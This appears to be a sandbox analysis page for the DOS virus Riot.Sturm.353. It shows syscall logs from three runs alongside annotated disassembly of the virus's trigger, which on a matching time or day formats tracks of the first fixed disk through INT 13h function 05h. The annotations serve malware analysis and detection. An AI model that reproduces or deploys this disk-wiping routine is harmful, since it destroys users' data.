Sample viewer

vx.netlux.org/Virus.DOS.Riot.Sturm.353


Syscalls:

Time Syscall Op Syscall Name
; Sandbox syscall rows with the disassembly printed beside each logged DOS call. Each listing starts at the
; PC given in its row, which looks like the return address of the logged INT 21h (NOTE(review): confirm).
; Register meanings follow the documented DOS/BIOS interfaces:
;   INT 21h AH=2Ch (Get time): CH=hour, CL=minute, DH=second, DL=hundredths of a second
;   INT 21h AH=2Ah (Get date): CX=year, DH=month, DL=day of month
;   INT 13h AH=05h (format track): CH=cylinder, DH=head, DL=drive (80h = first fixed disk)
2018-12-17T22:24:09.53290541Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2    ; after Get time: is the hundredths field equal to 2?
0x12a84: je 0x12a94                         ; yes -> go straight to the disk routine; the Get date row below shows it was not taken here
0x12a86: mov ah, 0x2a                       ; select DOS "Get date"
0x12a88: int 0x21                           ; logged by the sandbox as the next row (op 42)
0x12a8a: cmp dl, 2                          ; after Get date: is it the 2nd day of the month?
0x12a8d: je 0x12a94                         ; yes -> disk routine
0x12a8f: cmp cl, 0x3b                       ; CL is now the low byte of the year (Get date overwrote CX), compared with 0x3B (59)
                                            ; for the documented 1980-2099 range (0x07BC-0x0833) this never matches;
                                            ; presumably minute 59 from Get time was intended - TODO confirm
0x12a92: jne 0x12aa5                        ; no trigger matched: skip the disk routine
0x12a94: xor ch, ch                         ; cylinder 0 (CL is left unchanged)
0x12a96: mov ah, 5                          ; BIOS disk function 05h: format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call; it is not a DOS call, so it has no row in this table
                                            ; no ES:BX buffer setup is visible in this excerpt
                                            ; detection: INT 13h AH=05h on drive 80h from an ordinary program is a strong behavioural indicator
0x12a9e: inc ch                             ; advance to the next cylinder
0x12aa0: cmp dh, 0xff                       ; ZF is set only if DH reads FFh after the BIOS call
0x12aa3: loopne 0x12a96                     ; decrement CX and repeat while CX != 0 and ZF is clear; CX includes CH,
                                            ; so the number of passes cannot be read off this excerpt
0x12aa5: mov ax, es                         ; presumably ES still holds the PSP segment from program load - verify
0x12aa7: add ax, 0x10                       ; skip the 0x10 paragraphs of the PSP
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; add a word stored in the code segment at bp+0x15b; looks like a saved host CS - TODO confirm
0x12aaf: push ax                            ; pushed segment value
2018-12-17T22:24:09.54465266Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2    ; same code as 0x12a8a above: day of month == 2?
0x12a8d: je 0x12a94                         ; yes -> disk routine
0x12a8f: cmp cl, 0x3b                       ; low byte of the year against 0x3B (see the note on this address above)
0x12a92: jne 0x12aa5                        ; no trigger matched: skip the disk routine
0x12a94: xor ch, ch                         ; cylinder 0
0x12a96: mov ah, 5                          ; BIOS format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call, not visible in the DOS syscall rows
0x12a9e: inc ch                             ; next cylinder
0x12aa0: cmp dh, 0xff                       ; ZF only if DH == FFh
0x12aa3: loopne 0x12a96                     ; repeat while CX != 0 and ZF is clear
0x12aa5: mov ax, es                         ; presumably the PSP segment - verify
0x12aa7: add ax, 0x10                       ; skip the PSP
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; stored word at bp+0x15b, possibly the host's saved CS
0x12aaf: push ax                            ; pushed segment value
0x12ab0: push word ptr cs:[bp + 0x159]      ; pushes the adjacent stored word; with the segment above it looks like a far
                                            ; return address back to the host program - TODO confirm where it is consumed
0x12ab5: push ds                            ; save the caller's DS
0x12ab6: push cs                            ; DS = CS so the following code can address its own data
0x12ab7: pop ds
; In this run the next logged row (Set disk transfer address, PC 12ac0) follows Get date by about 3.7 ms.
2018-12-17T22:24:09.54832525Z 26 PC: 12ac0 | Set disk transfer address
2018-12-17T22:24:09.549543313Z 25 PC: 12ac4 | Get default drive
2018-12-17T22:24:09.551191357Z 26 PC: 12b7d | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4244,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Sandbox syscall rows with the disassembly printed beside each logged DOS call. Each listing starts at the
; PC given in its row, which looks like the return address of the logged INT 21h (NOTE(review): confirm).
; Documented interfaces used below: INT 21h AH=2Ch returns CH=hour, CL=minute, DH=second, DL=hundredths;
; INT 21h AH=2Ah returns CX=year, DH=month, DL=day; INT 13h AH=05h formats a track (CH=cylinder, DH=head, DL=drive).
2018-12-25T11:51:21.681007394Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2    ; time trigger: hundredths of a second == 2?
0x12a84: je 0x12a94                         ; match -> disk routine; the Get date row below shows it was not taken in this run
0x12a86: mov ah, 0x2a                       ; DOS "Get date"
0x12a88: int 0x21                           ; appears as the next logged row (op 42)
0x12a8a: cmp dl, 2                          ; date trigger: day of month == 2?
0x12a8d: je 0x12a94                         ; match -> disk routine
0x12a8f: cmp cl, 0x3b                       ; CL holds the low byte of the year here, not the minute: Get date overwrote CX
                                            ; 0x3B does not occur as a low byte in 1980-2099 (0x07BC-0x0833), so this check
                                            ; looks dead; presumably minute 59 was intended - TODO confirm
0x12a92: jne 0x12aa5                        ; nothing matched: bypass the disk routine
0x12a94: xor ch, ch                         ; start at cylinder 0 (CL untouched)
0x12a96: mov ah, 5                          ; INT 13h function 05h, format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; drive 80h, the first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call; BIOS calls have no row in this DOS syscall table
                                            ; detection: a non-utility program issuing AH=05h on drive 80h is a strong indicator
0x12a9e: inc ch                             ; next cylinder
0x12aa0: cmp dh, 0xff                       ; sets ZF only when DH is FFh after the call
0x12aa3: loopne 0x12a96                     ; CX is decremented; loop continues while CX != 0 and ZF is clear
                                            ; CX contains CH, so the pass count is not evident from this excerpt
0x12aa5: mov ax, es                         ; presumably the PSP segment left in ES at program load - verify
0x12aa7: add ax, 0x10                       ; step over the PSP (0x10 paragraphs)
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; adds a stored word at bp+0x15b; looks like the host's saved CS - TODO confirm
0x12aaf: push ax                            ; pushed segment value
2018-12-25T11:51:21.683950209Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2    ; same code as 0x12a8a above: day of month == 2?
0x12a8d: je 0x12a94                         ; match -> disk routine
0x12a8f: cmp cl, 0x3b                       ; low byte of the year against 0x3B (see the note on this address above)
0x12a92: jne 0x12aa5                        ; nothing matched: bypass the disk routine
0x12a94: xor ch, ch                         ; cylinder 0
0x12a96: mov ah, 5                          ; format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call, absent from the DOS syscall rows
0x12a9e: inc ch                             ; next cylinder
0x12aa0: cmp dh, 0xff                       ; ZF only if DH == FFh
0x12aa3: loopne 0x12a96                     ; loop while CX != 0 and ZF is clear
0x12aa5: mov ax, es                         ; presumably the PSP segment - verify
0x12aa7: add ax, 0x10                       ; step over the PSP
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; stored word at bp+0x15b, possibly the host's saved CS
0x12aaf: push ax                            ; pushed segment value
0x12ab0: push word ptr cs:[bp + 0x159]      ; pushes the adjacent stored word; together with the segment this looks like a
                                            ; far return address into the host program - TODO confirm where it is consumed
0x12ab5: push ds                            ; keep the caller's DS
0x12ab6: push cs                            ; DS = CS for access to the code's own data
0x12ab7: pop ds
; In this run the next logged row (Set disk transfer address, PC 12ac0) follows Get date by about 2.5 ms.
2018-12-25T11:51:21.686463321Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:51:21.687692189Z 25 PC: 12ac4 | Get default drive
2018-12-25T11:51:21.689227983Z 26 PC: 12b7d | Set disk transfer address

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4244,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Sandbox syscall rows with the disassembly printed beside each logged DOS call. Each listing starts at the
; PC given in its row, which looks like the return address of the logged INT 21h (NOTE(review): confirm).
; Documented interfaces used below: INT 21h AH=2Ch returns CH=hour, CL=minute, DH=second, DL=hundredths;
; INT 21h AH=2Ah returns CX=year, DH=month, DL=day; INT 13h AH=05h formats a track (CH=cylinder, DH=head, DL=drive).
2018-12-25T11:51:21.808209808Z 44 PC: 12a81 | Get time 0x12a81: cmp dl, 2    ; time trigger: hundredths of a second == 2?
0x12a84: je 0x12a94                         ; match -> disk routine; the Get date row below shows it was not taken in this run
0x12a86: mov ah, 0x2a                       ; DOS "Get date"
0x12a88: int 0x21                           ; appears as the next logged row (op 42)
0x12a8a: cmp dl, 2                          ; date trigger: day of month == 2?
0x12a8d: je 0x12a94                         ; match -> disk routine
0x12a8f: cmp cl, 0x3b                       ; CL holds the low byte of the year here, not the minute: Get date overwrote CX
                                            ; 0x3B does not occur as a low byte in 1980-2099 (0x07BC-0x0833), so this check
                                            ; looks dead; presumably minute 59 was intended - TODO confirm
0x12a92: jne 0x12aa5                        ; nothing matched: bypass the disk routine
0x12a94: xor ch, ch                         ; start at cylinder 0 (CL untouched)
0x12a96: mov ah, 5                          ; INT 13h function 05h, format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; drive 80h, the first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call; BIOS calls have no row in this DOS syscall table,
                                            ; so the table alone cannot show whether this loop ran
0x12a9e: inc ch                             ; next cylinder
0x12aa0: cmp dh, 0xff                       ; sets ZF only when DH is FFh after the call
0x12aa3: loopne 0x12a96                     ; CX is decremented; loop continues while CX != 0 and ZF is clear
                                            ; CX contains CH, so the pass count is not evident from this excerpt
0x12aa5: mov ax, es                         ; presumably the PSP segment left in ES at program load - verify
0x12aa7: add ax, 0x10                       ; step over the PSP (0x10 paragraphs)
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; adds a stored word at bp+0x15b; looks like the host's saved CS - TODO confirm
0x12aaf: push ax                            ; pushed segment value
2018-12-25T11:51:21.811376652Z 42 PC: 12a8a | Get date 0x12a8a: cmp dl, 2    ; same code as 0x12a8a above: day of month == 2?
0x12a8d: je 0x12a94                         ; match -> disk routine
0x12a8f: cmp cl, 0x3b                       ; low byte of the year against 0x3B (see the note on this address above)
0x12a92: jne 0x12aa5                        ; nothing matched: bypass the disk routine
0x12a94: xor ch, ch                         ; cylinder 0
0x12a96: mov ah, 5                          ; format track
0x12a98: xor dh, dh                         ; head 0
0x12a9a: mov dl, 0x80                       ; first fixed disk
0x12a9c: int 0x13                           ; destructive BIOS call, absent from the DOS syscall rows
0x12a9e: inc ch                             ; next cylinder
0x12aa0: cmp dh, 0xff                       ; ZF only if DH == FFh
0x12aa3: loopne 0x12a96                     ; loop while CX != 0 and ZF is clear
0x12aa5: mov ax, es                         ; presumably the PSP segment - verify
0x12aa7: add ax, 0x10                       ; step over the PSP
0x12aaa: add ax, word ptr cs:[bp + 0x15b]   ; stored word at bp+0x15b, possibly the host's saved CS
0x12aaf: push ax                            ; pushed segment value
0x12ab0: push word ptr cs:[bp + 0x159]      ; pushes the adjacent stored word; together with the segment this looks like a
                                            ; far return address into the host program - TODO confirm where it is consumed
0x12ab5: push ds                            ; keep the caller's DS
0x12ab6: push cs                            ; DS = CS for access to the code's own data
0x12ab7: pop ds
; NOTE(review): in this run the next logged row (Set disk transfer address, PC 12ac0) comes about 1.85 s after
; Get date, against roughly 2.5-3.7 ms in the other two runs on this page. That gap may be the INT 13h loop at
; 0x12a96 executing. The settings record printed between the previous run and this one has Day 2, which would
; satisfy the day-of-month check; the page does not state which run that record belongs to - confirm.
2018-12-25T11:51:23.65813307Z 26 PC: 12ac0 | Set disk transfer address
2018-12-25T11:51:23.659044364Z 25 PC: 12ac4 | Get default drive
2018-12-25T11:51:23.660121377Z 26 PC: 12b7d | Set disk transfer address